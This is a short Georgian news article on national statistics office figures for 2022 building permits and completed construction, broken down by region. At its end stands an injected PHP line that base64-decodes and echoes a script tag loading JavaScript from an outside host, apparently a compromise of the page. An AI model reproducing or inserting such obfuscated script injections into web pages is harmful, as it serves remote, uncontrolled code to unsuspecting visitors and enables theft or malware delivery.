celsiusi
ავერსი საქკაბელი
ოფიციალური დეკლარირებული მონაცემებით, საქართველოში 2022 წელს გაცემულია 10 822 ნებართვა (წინა წელთან შედარებით 7.2 პროცენტით მეტი) 7 421.9 ათასი კვ.მ ფართობის შენობა-ნაგებობების მშენებლობაზე (წინა წელთან შედარებით 0.2 პროცენტით ნაკლები). ამის შესახებ მონაცემებს სტატისტიკის ეროვნული სამსახური აქვეყნებს.
მათივე ცნობით, ნებართვების 77.2 პროცენტი მოდის ქვეყნის 4 რეგიონზე, კერძოდ, ჩასატარებელი სამშენებლო სამუშაოების 51.9 პროცენტი მოდის თბილისზე, 10.5 პროცენტი - მცხეთა-მთიანეთის რეგიონზე, 8.4 პროცენტი - ქვემო ქართლის რეგიონზე და 6.4 პროცენტი - იმერეთის რეგიონზე.
„აღსანიშნავია, რომ 2022 წელს ნებართვები გაიცა მრავალფუნქციური საცხოვრებელი კომპლექსების, სავაჭრო ობიექტების, სასტუმროების, სამრეწველო საწარმოების, სასოფლო-სამეურნეო დანიშნულების ობიექტებისა და სხვა შენობა-ნაგებობების მშენებლობაზე.
გაცემულ ნებართვებში შედარებით დიდი წილით წარმოდგენილია მრავალფუნქციური საცხოვრებელი კომპლექსები. 2022 წელს ექსპლუატაციაში მიღებულია 2 661.7 ათასი კვ.მ ფართობის (წინა წელთან შედარებით 51.3 პროცენტით მეტი) 2 654 ობიექტი (წინა წელთან შედარებით 13.1 პროცენტით მეტი).
ექსპლუატაციაში მიღებული ობიექტების ნახევარზე მეტი მოდის ქვეყნის 4 რეგიონზე, კერძოდ, 36.6 პროცენტი მოდის თბილისზე, 11.8 პროცენტი - მცხეთა-მთიანეთის რეგიონზე, 11.2 პროცენტი - კახეთის რეგიონზე და 9.1 პროცენტი - იმერეთის რეგიონზე,“- ნათქვამია საქსტატის ინფორმაციაში. 
551
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");